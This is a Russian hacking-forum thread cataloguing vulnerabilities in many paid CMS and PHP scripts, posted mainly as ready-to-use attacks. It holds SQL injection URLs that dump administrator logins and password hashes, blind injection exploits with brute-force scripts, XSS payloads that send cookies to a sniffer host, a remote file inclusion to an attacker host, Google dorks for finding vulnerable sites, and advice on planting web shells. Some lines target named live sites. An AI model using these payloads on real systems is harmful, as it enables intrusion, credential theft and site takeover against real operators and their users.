![]() |
Обзор уязвимостей в платных Cms
VistaCMS
Оф.сайт: http://www.vistacms.ru Стоимость (в руб.): 13000-42000 o.O ------------------------------------------------ Раскрытие путей: http://www.vistacms.ru/modules/kerne'l/ Код:
/usr/home/admin/domains/vistacms.ru/public_html/class/page.class.phpАдминистраторская панель: Код:
http://www.vistacms.ru/admin/Пароль: antichat.ru Клиенты: Код:
http://www.vistacms.ru/clients/P.S. Уязвимость в авторизации, была замечена не везде. С чем это связано не знаю, про версию CMS ничего не говориться. |
UMI.CMS
Оф.сайт: www.umi-cms.ru Стоимость (в руб.): 2990-29990 ------------------------------------------ XSS(Активная) Настройки -> Уязвимые поля: Фамилия Имя Отчество Код:
<script>alert(document.cookie)</script> |
Abo Cms
Уязвимость (sql-inj) обнаружена мной в ?модуле статистики? движка ABO CMS, файл c.php находится обычно в корне веб-директории сайта, реально заюзать уязвимость можно в MySQL 4.1 и выше, так как в более ранних версиях нет возможности использовать подзапросы...
цена ABO CMS на офф. сайте достигает 30000 рублей. На этом движке работают крупные инет-магазины, банки, и т.д. вот сплоит ТУТ написанный на php для получения логина и хеша пароля первого пользователя... для получения других данных скрипт не сложно модифицировать... Скрипт написан немного корявенько, т.к. писался на скорую руку, так что больно не бейте |
S.Builder
Разработчик CMS CBS-Group Номер версии S.Builder 3.756 Лицензия платная Сайт www.sbuilder.ru Демо-версия www.demo.sbuilder.ru Функциональность портал Стоимость (в руб.) от 2235 до 44700 руб. для теста в вебе создают акк на сутки SQL-injection 20 полей Цитата:
Цитата:
5.0.22- log::dmsb_d7494517@localhost::dmsb_d7494517 Цитата:
Цитата:
|
VDNH
Оф. сайт http://www.vdnh.ru/ Лицензия - платная Стоимость- от 6750- 176625 уязвимость - xss активная, пассивная <script>alert('helloworld')</script> также бажные у них гостевые книги. |
Уязвимости в Bitrix CMS
Multiple Vulns in Bitrix CMS
Версия системы и история обновления Vulnerable: Bitrix Site Manager 4.1.x Exploit: Код:
http://www.bitrix.ru/bitrix/updates/updater.logУязвимость присутствует из-за редиректа в форме авторизации во время POST- запроса. Атакующий может подменить значение скрытого поля back_url и перенаправить жертву на вредоносную страницу. Раскрытие пути Vulnerable: Bitrix Site Manager 4.0.x Exploit: Код:
http://host/bitrix/templates/.default/subscribe/subscr_form.php Vulnerable: Bitrix Site Manager 4.0.x Exploit: Код:
http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/ |
Amiro.CMS
сайт: amiro.ru XSS (passive) Сплоентс: Код:
/saleoffset=saleoffset=<script>alert(document.cookie)</script>Код:
/blabla<script>alert(document.cookie)</script> |
Mix Systems
vendor:http://mixsystems.com.ua price "МИКС-ВИЗИТКА от 500 у. е." -- "МИКС-ПОРТАЛ от 5000 у. е." SQL injection plugin:katalog EX Код:
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'Код:
version::user::databaseEx Код:
http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'&cat=11Код:
version::user::database(c) halkfild написал сплоит на CURL /*быстрее чем сокеты*/ PHP код:
|
ExpiCMS
www.expi-cms.ru стоимость 1. Лицензия 1 год - 6 900 руб. 2. Лицензия 3 года - 12 900 руб. 3. Неограниченная лицензия - 17 490 руб Пассивная xss вход в админку www.expi-cms.ru/cms/login.php в логин и пароль вставляеем например такую конструкцию :) </SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script> Цитата:
|
SQL inj в Shop-Script
Shop-Script
Разработчик Articus dev. group Лицензия платная Сайт www.shop-script.ru/ Демо-версия www.demo.shop-script.ru/premium Функциональность e-магазин Стоимость (в руб.) от 0 до 5450 руб. SQL injection уязвимый скрипт invoice_phys.php уязвимый парамерт order_time= данные передаются кодированные в base64; возможен только посимвольный перебор Пример уязвимого куска кода: PHP код:
Код:
2008-03-16 14:24:11" or 1=1/*Код:
2008-03-16 14:24:11" or orderID=1 and ascii(substring((select cust_password from SS_customers where customerID=1),1,1))=97/*Для удачного перебора нужно знать № существующего заказа в базе. Пароль в базе лежит перекодированный в base64, так что в открытом виде Поиск: __http://search.icq.com/search/results.php?q=inurl%3A%22index.php%3Ffeedback%3Dye s%22 Приблизительно 1500 стр... Рабочий скрипт для подбора пароля __http://rapidshare.com/files/100018966/SS_brute.rar.html Уязвимость не где не вылаживал, античат первый)) |
Smart-CMS
showNewsItem.php
Exploit: Код:
showNewsItem.php?news_id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,admin_id,user_name,password)+from+administrator--/admin/index.php |
тамже
showGallery.php?pagetitle=Gallery&category=1+and+1 =0+union+select+concat(user_name,0x3a,password)+fr om+administrator/* |
Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability
Код HTML:
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- |
Пассивная XSS в ARTUS-master
Уязвимо поле поиска. Цитата:
Цитата:
|
CNCat XSS:Уязвимости в add.php(можно как через GET тк и через POST),index.php и search.php Код:
http://site/add.php?description=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/search.php?q=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E |
Не уверен, что платная CMS, но тем не менее :)
SQL-inj в Siteframe CMS В скрипте folder.php, параметре id. Код:
http://site.com/folder.php?id=[sql]Цитата:
|
K-Links Directory SQL-INJECTION, XSS
================================================== ==============================
|| K-Links Directory SQL-INJECTION, XSS ================================================== ============================== Application: K-Links Directory -------------- Website: http://turn-k.net/k-links ----------- Version: Platinum (All) ---------- About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$. ------ Googledork: Powered By K-Links Directory --------------- Demo: http://klinksdemo.com -------- Date: 24-07-2008 ------- Description: --------------- Множественные SQL-Injection. Активные и пассивные XSS. [ SQL-INJECTION ] http://host/report/-1[SQL] http://host/visit.php?id=-1[SQL] http://host/addreview/-1[SQL] http://host/refer/-1[SQL] ===>>> Exploit: http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4 ,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2 ,3,4,5,6,7,8 from platinum_admins where a_id=1/* /* Admin Login - http://host/admin Далее, через Manage Templates получаем веб-шелл. */ [ ACTIVE XSS ] *) На сайте в поиске вбиваем <script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script> При просмотре администратором поисковых запросов, его cookies уйдут на сторонний ресурс. *) На любую ссылку можно оставить мнение. После чего это сообщение появится у администратора. [ PASSIVE XSS :) ] http://host/index.php?req=login&redirect=&login_message=<scrip t>alert()</script> Author: Corwin --------- Contact: corwin88[dog]mail[dot]ru ----------- p.s. к сожалению не удалось найти скрипты и провести нормальный аудит кода. |
================================================== ==============================
|| Dating 3 PHP Script SQL-INJECTION ================================================== ============================== Application: E-topbiz Dating 3 PHP Script ------------ Version: All -------- Website: http://e-topbiz.com/oprema/pages/dating3.php -------- Demo: http://e-topbiz.com/trafficdemos/dating3 ----- About: Dating 3 is a very powerful top quality dating php script for webmasters who wish to run an online dating site. ------ Date: 01-08-2008 ----- [ VULNERABLE CODE ] members/mail.php @Line: PHP код:
===>>> Exploit: http://host/members/mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin/* Author: Corwin ------- Contact: corwin88[dog]mail[dot]ru -------- |
============================
|| PPVCHAT ACTIVE XSS ============================ Application: PPVCHAT ------------ Website: http://ppvchat.com/ -------- Version: All -------- About: Pay-per-view adult video chat software. Price 999$. ------ Googledork: Copyright © 2006 PPVChat.com ----------- Date: 05-07-2008 ----- Description: ------------ При регистрации новых пользователей/моделей нет фильтрации полей. ===>>> Exploit: <script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script> Author: Corwin ------- Contact: corwin88[dog]mail[dot]ru -------- |
================================================== ==============================
|| E-topbiz Payment Processor 2 SQL-INJECTION ================================================== ============================== Application: E-topbiz Payment Processor 2 ------------ Version: 2.0 -------- Website: http://e-topbiz.com/oprema/pages/pproc2.php -------- Demo: http://e-topbiz.com/trafficdemos/payment2/ ----- About: The payment processor php script allows you to own and operate your very own paypal type payment processor ------ website and to make a percentage OF EACH AND EVERY TRANSACTION that takes place on your site. Date: 01-08-2008 ----- [ SQL-INJECTION ] http://host/shop.htm?cid=-1[SQL] ===>>> Exploit: http://host/shop.htm?cid=-1 union select 1,2,concat(user(),0x3a,version()) Author: Corwin ------- Contact: corwin88[dog]mail[dot]ru -------- |
================================================== ==============================
|| Recipe Script SQL-INJECTION ================================================== ============================== Application: Recipe Script ------------ Version: 6.0 -------- Website: http://fivedollarscripts.com -------- Demo: http://recipebag.com ----- Date: 03-08-2008 ----- [ VULNERABLE CODE ] viewrecipe.php PHP код:
===>>> Exploit: http://host/blabla-0 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2 ,3,4,5,6,7,8,9 from recipesadmin.php // Admin Login - http:/host/admin2 Greetzz !!! Форб, с отцовством бро! :-)!! Author: Corwin ------- Contact: corwin88[dog]mail[dot]ru -------- |
================================================== ==============================
|| Bartender Drinks SQL-INJECTION ================================================== ============================== Application: Bartender Drinks ------------ Version: All -------- Website: http://fivedollarscripts.com -------- Demo: http://fivedollarscripts.com/drinks/ ----- Date: 04-08-2008 ----- [ VULNERABLE CODE ] viewdrinks.php PHP код:
viewdrink.php PHP код:
===>>> Exploit: http://host/index.php?cmd=6&recid=-1 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2 ,3 from drinksadmin/* // Admin Login - http:/host/admin2 by me |
Ultraseek
XSS:
Код:
http://site/highlight/index.html?url=http://forum.antichat.ru.html&fterm=test&la=en&charset=utf-8&search=../query.html%3Fcharset%3Dutf-8%26qt%3Dtesthttp://site/help/syntax.html?la=/../../index http://site/help/searchtips.html?la=/../../index http://site/help/refine.html?la=/../../index http://site/help/special.html?la=/../../index http://site/help/boolean.html?la=/../../index http://site/help/meta.html?la=/../../index Local File Inclusion: http://site/help/syntax.html?la=/../query http://site/help/searchtips.html?la=/../query http://site/help/refine.html?la=/../query http://site/help/special.html?la=/../query http://site/help/boolean.html?la=/../query http://site/help/meta.html?la=/../query |
CMS SiteEdit
XSS:
Код:
http://site/shop?se_namedomen=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/thanks?formobj_email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/registration?login=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EУязвимости на офф.сайте движка http://www.siteedit.ru Код:
http://www.siteedit.ru/thanks?autoreply_text=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://www.siteedit.ru/thanks?autoreply_text=%22%3E%3Ca%20href=http://forum.antichat.ru%3Eantichat%3C/a%3EКод:
http://www.siteedit.ru/registration?last_name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E |
SoSo News Express Pro 2.0.4. Blind SQL Injection Exploit (к сожалению, поковыряться удалось только в этой версии)
Уязвимый код: В файле includes/info_home.php: Код:
$this->client_ip=!empty($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : ( !empty($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : (!empty($REMOTE_ADDR) ? $REMOTE_ADDR : '' ));Код:
$DB->query("SELECT session_time FROM ". $DB->prefix ."stat_session WHERE client_ip='". $Info->client_ip ."' AND session_time>=". $update_time ." ORDER BY session_time DESC LIMIT 0,1");Т.к. полученый Sql inj - слепой, но с выводом ошибки, используем запрос: Код:
X_FORWARDED_FOR:-1' OR client_ip=IF(ascii(substring((SELECT user_password FROM news_user WHERE user_id=1),[POS],1))=[CHARCODE],'1',(SELECT 1 UNION SELECT 2))/*Сплоит запускать из коммандной строки, вот так: soso2sql.php http://site.com/ 1 Результат: md5(password). Собственно код: Код:
<?З.Ы. Проблема с X_FORWARDED_FOR присутствует и на официальном сайте, а значит наверняка и в более новых версиях. Пример: Цитата:
|
Огромное спасибо за выложеный баг. Я правда столкнулся с проблемой нахождения логина, пока не очень получаеться, немогли бы вы показать как вытащить логин админа?
спасибо! |
Вот тебе версия которая после подбора хеша подбирает и логин админа. Подбирает в диапазоне [a-Z,0-9], если будет мало, внимательно поправь значения кодов символов во втором цикле for (в тех что внутри for($i=1;$i<=32;$i++) ).
Код:
<? |
CustomCMS 4.0 (CCMS) print.php Remote SQL Injection Vulnerability
print.php
Vuln code: PHP код:
http://localhost/[installdir]/ Exploit: Код:
print.php?id='+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+from+ccms_user+where+userid=1/*(c) ~!Dok_tOR!~ |
PlayCMS <= 2.0 SQL Injection
Type: Game Script Price: $20 URL: www.playcms.com Condition: magic_quotes_gpc = Off Exploit: http://localhost/[installdir]/game.php?gameid=-1'+union+select+1,user(),version(),4,5,6,database( ),8/* http://localhost/[installdir]/index.php?gameid=-1'+union+select+1,2,3,4,5,6,7,8/* (c) ~!Dok_tOR!~ |
Vastal I-Tech CMS
Оф.сайт: vastal.com
|
E-phpscripts CMS Arya
Оф.сайт: ephpscripts.comДата: 09.09.08 |
InterTech WCMS SQL-injection Exploit
Оф.сайт: intertech-pal.comДата: 30.09.08 |
Xpoz SQL-INJECTION, XSS
с этим адвайсом получилась странная история - после отправки строку на милворм, через 2 дня я увидел его(в урезанном виде) на милворме, но авторство принадлежало каким-то непонятным хенкерам, на что str0ke только развел руками и сказал что они прислали на день раньше. :confused: ну да не важно, все-таки выложу здесь.
================================================== ============================== || Xpoz SQL-INJECTION, XSS ================================================== ============================== Application: Xpoz PRO (Expoze Photo Store) Website: http://xpoze.org Version: All(current 1.0) About: Xpoze is a photo store very easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs. Googledork: Powered by Powered by Xpoze.org Date: 01-07-2008 Description: Множественные уязвимости типа SQL-injection, Blind-injection, активные и пассивные XSS. [ SQL-INJECTION ] some... http://host/home.html?menu=1[SQL] http://host/user.html?uid=1[SQL] http://host/account/admin/edite.html?eid=1[SQL] http://host/video.html?limiter=0&c=1[SQL] And other vulnerable files: --------------------------- // $p=[admin, editor, user, photo] [ members/$p/edite.inc ] PHP код:
PHP код:
PHP код:
===>>> Exploit: http://host/user.html?uid=-1%20union%20select%201,user,1,1,1,pass,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20 users%20limit%203,1/* (!) Пароль в БД в открытом виде (!) [ ACTIVE XSS ] В форуме отсутствует фильтрация полей темы и сообщения. ===>>> Exploit: <script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script> [ PASSIVE XSS :) ] http://host/?tpl=[XSS] PHPInfo - http://host/info.php |
Absolute shopping cart
Сайт: http://www.absoluteshoppingcart.co.uk Цена: от £19.99 ------ SQL-Injection Цитата:
|
shop-script 1.24
shop-script 1.24 скрипт - один из самых распрастраненых движков интернет магазина. сейчас сняли с продажи, так как запустили новый скрипт. но shop-script 'ом все еще активно пользуются и не спешат переходить на новый продукт.magic_quotes_gpc = OFF Sql Injection: проверка на уязвимость: PHP код:
уязвимая переменная add2cart так как поля не выводятся то вытащить пароль админа можно перебором по буковке. пароль зашифрован base64 тоесть открыт логин не зашифрован, в 99.9% админ это юсер с customerID=1 и в 80% его логин admin google: inurl:"index.php?feedback=yes" примерно 1500 сайтов приведен реальный пример уязвимого сайта кстати для тех кто взламал логин/пароль магазина: добавить шелл можно через добавление нового товара. просто указываете что товар является програмой. в путь выбираете любой файл шелла не забудьте перед тем как добавить шелл залить файл .htaccess со значением Allow from all |
Post Affiliate Pro <=3.0.6 Code Execution
Post Affiliate Pro
Версия: 3.0.6 и более ранние Дорк: inurl:affiliates intext:"version 3.0." "generated in" "DB Requests" Уязвимый код: /affiliate/include/Affiliate/Merchants/Views/ResourceBrowser.class.php: PHP код:
PHP код:
PHP код:
/affiliate/merchants/styles.php?md=Affiliate_Merchants_Views_ResourceBr owser&action=addheader&commited=yes&header_name=lo lol&header_caption=phpinfo() |
Citrix NetScaler v.7
Уязвимый Файл: generic_api_call.pl XSS: Код:
http://site/ws/generic_api_call.pl?function=statns&stan |
Продукт: ArticleLive (Interspire Website Publisher)
Версия: NX.1.7.1.2(возможно и более ранние версии) Веб-сайт разработчика:http://www.interspire.com/ Цена:$249 Уязвимый скрипт:blogs.php?id={SQL-injection} Пример: Код:
http://www.journalismproject.ca/english_new/blogs.php?id=-768+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,144,15,16,17,18,19,20,21,22,23,24,25,26,27+from+ArticleLive_users+limit+0,1-- |
DMXReady Scripts http://www.dmxready.com Уязвимость: Remote Files Delete Vulnerability Продукт: DMXReady Blog Manager <= 1.1 Цена: 199.97 $ Dork : inurl:inc_webblogmanager.asp PHP код:
Уязвимость: Contents Change Vulnerability Продукт: DMXReady PayPal Store Manager <= 1.1 Цена: 129.97 $ Dork: inurl:inc_paypalstoremanager.asp Permissions: Update Delete Insert Category / Sub Category Image Upload You Find -> http://[target]/[path]//applications/PayPalStoreManager/inc_paypalstoremanager.asp Edit -> http://[target]/[path]//admin/PayPalStoreManager/CategoryManager/list.asp Продукт: DMXReady Photo Gallery Manager <= 1.1 Цена: 39.97 $ Dork: inurl:inc_photogallerymanager.asp Permissions: Update Delete Insert Category / Sub Category Image Upload You Find -> http://[target]/[path]//applications/PhotoGalleryManager/inc_photogallerymanager.asp Edit -> http://[target]/[path]//admin/PhotoGalleryManager/add_category.asp Продукт: DMXReady Registration Manager <= 1.1 Цена: 49.97 $ Dork: inurl:inc_registrationmanager.asp Permissions: Update Delete Insert Category / Sub Category You Find -> http://[target]/[path]//applications/RegistrationManager/inc_registrationmanager.asp Edit -> http://[target]/[path]//admin/RegistrationManager/add_category.asp Продукт: DMXReady BillboardManager <= 1.1 Цена: 49.97 $ Permissions: Update Delete Insert Category / Sub Category You Find -> http://[target]/[path]//applications/BillboardManager/ Edit -> http://www.demo.dmxready.com/admin/BillboardManager/add_category.asp Уязвимость: Remote Contents Change Vulnerability Продукт: DMXReady Catalog Manager <= 1.1 Цена: 149.97 $ Dork: inurl:inc_catalogmanager.asp Permissions: Update Delete Insert Category / Sub Category You Find -> http://[target]/[path]//applications/RegistrationManager/inc_registrationmanager.asp Edit -> http://[target]/[path]//admin/RegistrationManager/add_category.asp Продукт: DMXReady Contact Us Manager <= 1.1 Цена: 49.97 $ Dork: inurl:inc_contactusmanager.asp Permissions: Update Delete Insert Category / Sub Category Image Upload You Find -> http://[target]/[path]//applications/ContactUsManager/inc_contactusmanager.asp Edit -> http://[target]/[path]//admin/ContactUsManager/add_category.asp Продукт: DMXReady Document Library Manager <= 1.1 Цена: 39.97 $ Dork: inurl:inc_documentlibrarymanager.asp Permissions: Update Delete Insert Category / Sub Category Image Upload You Find -> http://[target]/[path]//applications/DocumentLibraryManager/inc_documentlibrarymanager.asp Edit -> http://[target]/[path]//admin/DocumentLibraryManager/add_category.asp Продукт: DMXReady Faqs Manager <= 1.1 Цена: 24.97 $ Dork: inurl:inc_faqsmanager.asp Permissions: Update Delete Insert Category / Sub Category Image Upload You Find -> http://[target]/[path]//applications/FaqsManager/inc_faqsmanager.asp Edit -> http://[target]/[path]//admin/FaqsManager/add_category.asp Продукт: DMXReady Job Listing <= 1.1 Цена: 49.97 $ Dork: inurl:inc_joblistingmanager.asp Permissions: Update Delete Insert Category / Sub Category Image Upload You Find -> http://[target]/[path]//applications/JobListingManager/inc_joblistingmanager.asp Edit -> http://[target]/[path]//admin/JobListingManager/CategoryManager/list.asp Продукт: DMXReady Links Manager <= 1.1 Цена: 24.97 $ Dork: inurl:inc_linksmanager.asp Permissions: Update Delete Insert Category / Sub Category You Find -> http://[target]/[path]//applications/LinksManager/inc_linksmanager.asp Edit -> http://[target]/[path]//admin/LinksManager/add_category.asp Уязвимость: SQL Injection Vulnerability Продукт: DMXReady Classified Listings Manager <= 1.1 Цена: 99.97 $ Dork: inurl:inc_classifiedlistingsmanager.asp Admin Login: http://[target]/[path]//admin/ClassifiedListingsManager/manage.asp USERNAME-> Код:
http://[target]/[path]/admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminUserName,2,5,9,3 from tblCLM_configКод:
http://[target]/[path]///admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminPassword,2,5,9,3 from tblCLM_configЦена:99.97 $ Dork: inurl:inc_memberdirectorymanager.asp Admin Login: http://[target]/[path]/admin/MemberDirectoryManager/admin.asp USERNAME-> Код:
http://[target]/[path]/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminUserName,4,3,2,1 from tblMDM_configКод:
http://[target]/[path]/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminPassword,4,3,2,1 from tblMDM_configЦена: 149.97 $ Dork: inurl:inc_membersareamanager.asp Admin Login: http://[target]/[path]/admin/MembersAreaManager/admin.asp USERNAME-> Код:
http://[target]/[path]/admin/MembersAreaManager/components/SecurityLevelManager/upload_image_security_level.asp?cid=-12312312 union select 1,Security_AdminUserName,3,4,5,6 from tblConfigКод:
http://[target]/[path]/admin/MembersAreaManager/components/SecurityLevelManager/upload_image_security_level.asp?cid=-12312312 union select 1,Security_AdminPassword,3,4,5,6 from tblConfigУязвимость: Remote File Download Vulnerability Цена:389.97 $ Код:
http://[target]/path/control_panel/download_link.asp?filename=inc_faqsmanager_qs_jump_menu.asp&filelocation={FILE PATH}Уязвимость: Remote SQL Injection Vulnerability Цена:189.97 $ Admin Login:http://[target]/[path]/admin/SecureDocumentLibrary/admin.asp USERNAME-> Код:
http://[target]/[path]/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfigКод:
http://[target]/[path]/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfigУязвимость: Remote File Upload Vulnerability Цена:49.97 $ Dork: inurl:inc_billboardmanager.asp?ItemID= # http://[target]/[path]/admin/BillboardManager/upload_document.asp?ItemID=[ItemID] ItemID= 1,2,3,4,5....... Example: You Find -> http://[target]/[path]//applications/BillboardManager/inc_billboardmanager.asp Edit -> http://[target]/[path]//admin/BillboardManager/upload_document.asp?ItemID=[ItemID] DMXReady BillboardManager <= 1.1 Contents Change Vulnerability find by x0r all other vulnerability found by ajann |
S.Builder CMS RFI/LFI
Сайт разработчика: http://www.sbuilder.ru
Уязвимые версии: тестировалось на версии 3.7, но, вероятно, уязвимость присутствует и в следующих версиях. Описание: Движок этой cms создает файлы сайта (index.php, etc) с кодом вида: Код:
<?php if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = ''; ?> |
| Время: 07:37 |